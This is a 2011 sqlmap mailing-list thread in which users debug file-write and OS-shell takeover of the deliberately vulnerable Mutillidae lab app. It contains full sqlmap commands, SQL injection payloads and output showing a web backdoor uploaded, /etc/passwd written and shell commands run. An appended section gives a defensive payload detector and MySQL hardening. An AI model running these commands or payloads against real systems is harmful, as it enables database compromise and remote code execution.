Hi Chris,

Please, provide sqlmap with:

--data "view_user_name=admin&password=adminpass&Submit_button=Submit"

By invalid I mean a view_user_name value (perhaps in your version of
mutillidae it's called username) which is accepted, as well as a
valid password in this case.

Cheers,
Bernardo


On 7 July 2011 11:37, Chris Oakley <christopher.oak...@gmail.com> wrote:
> Hi Bernardo
>
> I'm not sure what you mean when you say that the POST parameters are
> invalid.  I tried the following:
>
> C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/mutillidae/index.php?page=user-info.php" --data "username=foo&password=bar&user-info-php-submit-button=View+Account+details" -p "username" --os-shell
>
> and the following occurs:
>
> [11:31:47] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: MySQL 5.0
> [11:31:47] [INFO] going to use a web backdoor for command prompt
> [11:31:47] [INFO] fingerprinting the back-end DBMS operating system
> [11:31:48] [INFO] the back-end DBMS operating system is Windows
> [11:31:48] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] PHP (default)
> [4] JSP
>>
> [11:31:49] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: C:\wamp\www\mutillidae
> [11:32:01] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload the agent [Enter for None]: C:\wamp\www\mutillidae
> [11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/mutillidae'
> [11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/mutillidae/mutillidae'
> [11:32:08] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 2 times
> [11:32:08] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost'
>
> [*] shutting down at 11:32:08
>
> Could it be to do with:
>
> [11:31:49] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: C:\wamp\www\mutillidae
> [11:32:01] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload the agent [Enter for None]: C:\wamp\www\mutillidae
>
> Regards
>
> Chris
>
> On 6 July 2011 23:52, Bernardo Damele A. G. <bernardo.dam...@gmail.com>
> wrote:
>>
>> Hi Chris,
>>
>> No worries.
>> If you want command execution, sqlmap can handle it automatically also
>> when it's MySQL and you've got a writable folder within the document
>> root, --os-cmd and --os-shell. Also, --os-pwn can work in this
>> scenario too.
>> The file stager uploaded is 0KB because you provide invalid values to
>> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
>> upload the file stager against MySQL.
>>
>> See:
>> --8<--
>> $ python sqlmap.py -u "http://debian32/mutillidae/index.php?page=user-info.php" --data "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 --os-shell --flush-session
>>
>>    sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
>> tool
>>    http://sqlmap.sourceforge.net
>>
>> [!] legal disclaimer: usage of sqlmap for attacking targets without
>> prior mutual consent is illegal. It is the end user's responsibility
>> to obey all applicable local, state and federal laws. Authors assume
>> no liability and are not responsible for any misuse or damage caused
>> by this program
>>
>> [*] starting at 23:49:52
>>
>> [23:49:52] [INFO] setting file for logging HTTP traffic
>> [23:49:52] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' as session file
>> [23:49:52] [INFO] flushing session file
>> [23:49:52] [INFO] testing connection to the target url
>> [23:49:52] [INFO] heuristics detected web page charset 'ascii'
>> [23:49:52] [INFO] testing if the url is stable, wait a few seconds
>> [23:49:53] [INFO] url is stable
>> [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic
>> [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not
>> dynamic
>> [23:49:53] [INFO] heuristic test shows that POST parameter
>> 'view_user_name' might be injectable (possible DBMS: MySQL)
>> [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name'
>> [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>> HAVING clause'
>> [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND
>> error-based - WHERE or HAVING clause' injectable
>> [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11
>> AND time-based blind' injectable
>> [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns
>> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
>> query (NULL) - 1 to 10 columns' injectable
>> POST parameter 'view_user_name' is vulnerable. Do you want to keep
>> testing the others? [y/N]
>> sqlmap identified the following injection points with a total of 30
>> HTTP(s) requests:
>> ---
>> Place: POST
>> Parameter: view_user_name
>>    Type: error-based
>>    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>>    Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT
>> COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033)
>> THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM
>> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
>> 'ekpw'='ekpw&password=adminpass&Submit_button=Submit
>>
>>    Type: UNION query
>>    Title: MySQL UNION query (NULL) - 1 to 10 columns
>>    Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND 'TOwv'='TOwv&password=adminpass&Submit_button=Submit
>>
>>    Type: AND/OR time-based blind
>>    Title: MySQL > 5.0.11 AND time-based blind
>>    Payload: view_user_name=admin' AND SLEEP(5) AND
>> 'BfoH'='BfoH&password=adminpass&Submit_button=Submit
>> ---
>>
>> [23:51:31] [INFO] the back-end DBMS is MySQL
>>
>> web application technology: PHP 5.2.6, Apache 2.2.9
>> back-end DBMS: MySQL 5.0
>> [23:51:31] [INFO] going to use a web backdoor for command prompt
>> [23:51:31] [INFO] fingerprinting the back-end DBMS operating system
>> [23:51:31] [INFO] the back-end DBMS operating system is Linux
>> [23:51:31] [INFO] trying to upload the file stager
>> which web application language does the web server support?
>> [1] ASP
>> [2] ASPX
>> [3] PHP (default)
>> [4] JSP
>> >
>> [23:51:32] [WARNING] unable to retrieve the web server document root
>> please provide the web server document root [/var/www/]:
>> [23:51:32] [WARNING] unable to retrieve any web server path
>> please provide any additional web server full path to try to upload
>> the agent [Enter for None]: /var/www/test
>> [23:51:35] [WARNING] unable to upload the file stager on '/var/www'
>> [23:51:35] [INFO] the file stager has been successfully uploaded on
>> '/var/www/test' - http://debian32:80/test/tmpugbmo.php
>> [23:51:35] [INFO] the backdoor has probably been successfully uploaded
>> on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php
>> [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press
>> ENTER
>> os-shell> id
>> do you want to retrieve the command standard output? [Y/n/a]
>> command standard output:    'uid=33(www-data) gid=33(www-data)
>> groups=33(www-data)'
>>
>> os-shell> pwd
>> do you want to retrieve the command standard output? [Y/n/a]
>> command standard output:    '/var/www/test'
>>
>> os-shell> exit
>> [23:51:44] [WARNING] HTTP error codes detected during testing:
>> 404 (Not Found) - 1 times
>> [23:51:44] [INFO] Fetched data logged to text files under
>> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'
>>
>> [*] shutting down at 23:51:44
>> --8<--
>>
>> Cheers,
>> Bernardo
>>
>>
>> On 6 July 2011 23:46,  <christopher.oak...@gmail.com> wrote:
>> > Hi
>> >
>> > Thanks. It turns out I was being an idiot. With absolute paths I didn't
>> > realise that this also includes the destination file name. With that
>> > included, it works like a dream.
>> >
>> > What I haven't managed to get going properly yet is the --os-cmd flag.
>> > The temp stager file does appear, but is empty, 0KB. However; I think I'll
>> > save that one for another day!
>> >
>> > Regards
>> >
>> > Chris
>> > ------------------
>> >
>> > -----Original Message-----
>> > From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com>
>> > Date: Wed, 6 Jul 2011 23:42:22
>> > To: Chris Oakley<christopher.oak...@gmail.com>
>> > Cc: <sqlmap-users@lists.sourceforge.net>
>> > Subject: Re: [sqlmap-users] File Writing
>> >
>> > Hi Chris,
>> >
>> > To me it works well:
>> > --8<--
>> > $ python sqlmap.py -u "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p view_user_name --risk 3 --level 3 --parse-errors --file-write /etc/passwd --file-dest /tmp/test --flush-session
>> >
>> >    sqlmap/1.0-dev (r4217) - automatic SQL injection and database
>> > takeover tool
>> >    http://sqlmap.sourceforge.net
>> >
>> > [!] legal disclaimer: usage of sqlmap for attacking targets without
>> > prior mutual consent is illegal. It is the end user's responsibility
>> > to obey all applicable local, state and federal laws. Authors assume
>> > no liability and are not responsible for any misuse or damage caused
>> > by this program
>> >
>> > [*] starting at 23:26:35
>> >
>> > [23:26:35] [INFO] setting file for logging HTTP traffic
>> > [23:26:35] [INFO] testing connection to the target url
>> > [23:26:35] [INFO] heuristics detected web page charset 'ascii'
>> > [23:26:35] [INFO] searching for forms
>> > [#1] form:
>> > POST http://debian32:80/mutillidae/index.php?page=user-info.php
>> > POST data: view_user_name=&password=&Submit_button=Submit
>> > do you want to test this form? [Y/n/q]
>> >>
>> > Edit POST data [default:
>> > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
>> > detected):
>> > do you want to fill blank fields with random values? [Y/n]
>> > [23:26:37] [WARNING] the testable parameter 'view_user_name' you
>> > provided is not inside the GET
>> > [23:26:37] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' as session file
>> > [23:26:37] [INFO] flushing session file
>> > [23:26:37] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' as results file
>> > [23:26:37] [INFO] heuristics detected web page charset 'ascii'
>> > [23:26:37] [INFO] testing if the url is stable, wait a few seconds
>> > [23:26:38] [INFO] url is stable
>> > [23:26:38] [INFO] heuristic test shows that POST parameter
>> > 'view_user_name' might be injectable (possible DBMS: MySQL)
>> > [23:26:38] [INFO] testing sql injection on POST parameter
>> > 'view_user_name'
>> > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> > clause'
>> > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> > clause'
>> > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> > clause (Generic comment)'
>> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
>> > blind - WHERE or HAVING clause (Generic comment)' injectable
>> > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>> > HAVING clause'
>> > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>> > HAVING clause'
>> > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
>> > clause'
>> > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
>> > clause'
>> > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING
>> > clause'
>> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
>> > error-based - WHERE or HAVING clause' injectable
>> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>> > query)'
>> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
>> > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> > [23:26:43] [INFO] target url appears to be UNION injectable with 4
>> > columns
>> > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
>> > query (NULL) - 1 to 10 columns' injectable
>> > [23:26:43] [WARNING] in OR boolean-based injections, please consider
>> > usage of switch --drop-set-cookie if you experience any problems
>> > during data retrieval
>> > POST parameter 'view_user_name' is vulnerable. Do you want to keep
>> > testing the others? [y/N]
>> > sqlmap identified the following injection points with a total of 148
>> > HTTP(s) requests:
>> > ---
>> > Place: POST
>> > Parameter: view_user_name
>> >    Type: boolean-based blind
>> >    Title: OR boolean-based blind - WHERE or HAVING clause (Generic
>> > comment)
>> >    Payload: view_user_name=-5244' OR NOT (1884=1884)--
>> > &password=bDXj&Submit_button=Submit
>> >
>> >    Type: error-based
>> >    Title: MySQL OR error-based - WHERE or HAVING clause
>> >    Payload: view_user_name=-3024' OR 1 GROUP BY
>> > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
>> > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
>> > &password=bDXj&Submit_button=Submit
>> >
>> >    Type: UNION query
>> >    Title: MySQL UNION query (NULL) - 1 to 10 columns
>> >    Payload: view_user_name=IZBb' UNION ALL SELECT NULL, CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, NULL#&password=bDXj&Submit_button=Submit
>> > ---
>> >
>> > do you want to exploit this SQL injection? [Y/n]
>> > [23:26:46] [INFO] testing MySQL
>> > [23:26:46] [INFO] confirming MySQL
>> > [23:26:46] [INFO] the back-end DBMS is MySQL
>> >
>> > web application technology: PHP 5.2.6, Apache 2.2.9
>> > back-end DBMS: MySQL >= 5.0.0
>> > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system
>> > [23:26:46] [INFO] the back-end DBMS operating system is Linux
>> > [23:26:46] [WARNING] if the problem persists with 'None' values please
>> > try to use hidden switch --no-cast (fixing problems with some
>> > collation issues)
>> > do you want confirmation that the file '/tmp/test' has been
>> > successfully written on the back-end DBMS file system? [Y/n]
>> > [23:26:48] [INFO] the file has been successfully written and its size
>> > is 1848 bytes, but the size differs from the local file '/etc/passwd'
>> > (1845 bytes)
>> > [23:26:48] [WARNING] expect junk characters inside the file as a
>> > leftover from UNION query
>> > [23:26:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
>> >
>> > [*] shutting down at 23:26:48
>> > --8<--
>> >
>> > Cheers,
>> > Bernardo
>> >
>> >
>> > On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote:
>> >> Hi
>> >>
>> >> I'm playing with file writing.  I have a full privs root user set up in
>> >> mysql and am using
>> >>
>> >> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
>> >> to play with.  I've set up a /temp folder below the web root of the app.
>> >> I've put a file "evil.php" in the sqlmap working directory.  I've also
>> >> changed the permissions for all users on the temp folder to write access
>> >> allowed.
>> >>
>> >> I'm using the following input to try and upload this file:
>> >>
>> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/mutillidae/index.php?page=user-info.php" --data "username=&password=&user-info-php-submit-button=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" --file-write "evil.php" --file-dest "temp/evil.php"
>> >>
>> >> This is with the latest dev build by the way.
>> >>
>> >> The output I get is:
>> >>
>> >> [18:00:03] [INFO] the back-end DBMS is MySQL
>> >> web server operating system: Windows
>> >> web application technology: PHP 5.3.5, Apache 2.2.17
>> >> back-end DBMS: MySQL 5.0
>> >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
>> >> [18:00:03] [INFO] the back-end DBMS operating system is Windows
>> >> [18:00:04] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
>> >> do you want confirmation that the file 'temp/evil.php' has been successfully written on the back-end DBMS file system? [Y/n]
>> >> [18:00:12] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
>> >> [18:00:12] [WARNING] expect junk characters inside the file as a leftover from UNION query
>> >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost'
>> >>
>> >> [*] shutting down at 18:00:12
>> >>
>> >> and sure enough the file isn't written.  I've also tried using the
>> >> --no-cast switch, to no avail.
>> >>
>> >> Does anyone have any ideas on what could be going wrong here?  I can use
>> >> the --file-read switch to read any file such as C:\boot.ini.  The --os-cmd
>> >> and --os-pwn commands also fail at the stager upload phase, probably for
>> >> similar reasons.
>> >>
>> >> Any help would be appreciated
>> >>
>> >> Cheers
>> >>
>> >> Chris
>> >>
>> >>
>> >>
>> >
>> >
>> >
>>
>>
>>
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
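
The thread turns on sqlmap's UNION payloads and its LIMIT 1 INTO OUTFILE file-write reaching MySQL through the view_user_name POST parameter. The following is an added defender-side example, not code from sqlmap or from anyone in this thread: it decodes the CHAR()-built strings and 0x literals in logged request bodies and flags the indicators those payloads carry. The sample bodies, the stager path and the 'hello' payload are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample POST bodies, as a web server or WAF might log them.
# The first mirrors the UNION payload shape shown in the thread, the second
# the LIMIT ... INTO OUTFILE write sqlmap uses on MySQL, the third is benign.
SAMPLE_BODIES = [
    "view_user_name=admin' UNION ALL SELECT NULL, NULL, "
    "CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68) AS CHAR),"
    "CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND 'TOwv'='TOwv"
    "&password=adminpass&Submit_button=Submit",
    "view_user_name=admin' LIMIT 0,1 INTO OUTFILE '/var/www/test/stager.php' "
    "LINES TERMINATED BY 0x68656c6c6f-- -&password=adminpass&Submit_button=Submit",
    "view_user_name=admin&password=adminpass&Submit_button=Submit",
]

CHAR_CALL = re.compile(r"CHAR\(([0-9,\s]+)\)", re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")

def decode_char_calls(sql: str) -> str:
    """Replace MySQL CHAR(n,n,...) calls with the quoted string they build,
    so sqlmap's CHAR()-obfuscated delimiters such as ':lrd:' become readable."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return "'" + "".join(chr(c) for c in codes if c < 256) + "'"
    return CHAR_CALL.sub(repl, sql)

def decode_hex_literals(sql: str) -> str:
    """Render 0x.. literals (how file contents travel in an INTO OUTFILE
    write) as quoted text; odd-length runs are left untouched."""
    def repl(match):
        try:
            return "'" + bytes.fromhex(match.group(1)).decode("latin-1") + "'"
        except ValueError:
            return match.group(0)
    return HEX_LITERAL.sub(repl, sql)

def analyse_body(body: str) -> dict:
    """Decode one POST body and return the decoded text plus the names of
    the checks it triggered, in the order the checks run."""
    decoded = decode_hex_literals(decode_char_calls(unquote_plus(body)))
    checks = [
        ("union-select", r"UNION\s+ALL\s+SELECT"),
        ("file-write", r"INTO\s+(OUT|DUMP)FILE"),
        ("outfile-payload", r"LINES\s+TERMINATED\s+BY"),
        ("sqlmap-markers", r"'(:[a-z]{3}:)'"),   # ':lrd:' style delimiters
    ]
    findings = [name for name, pat in checks if re.search(pat, decoded, re.I)]
    return {"decoded": decoded, "findings": findings}

def scan(bodies) -> list:
    """Return (index, findings) for every body that triggered a check."""
    hits = []
    for i, body in enumerate(bodies):
        result = analyse_body(body)
        if result["findings"]:
            hits.append((i, result["findings"]))
    return hits
```

On the database side, MySQL's secure_file_priv set to NULL disables INTO OUTFILE and LOAD_FILE altogether, and a web application account without the FILE privilege cannot write the stager at all, which removes the precondition behind every successful write in this thread.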

------------------------------------------------------------------------------
All of the data generated in your IT infrastructure is seriously valuable.
Why? It contains a definitive record of application performance, security 
threats, fraudulent activity, and more. Splunk takes this data and makes 
sense of it. IT sense. And common sense.
http://p.sf.net/sfu/splunk-d2d-c2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
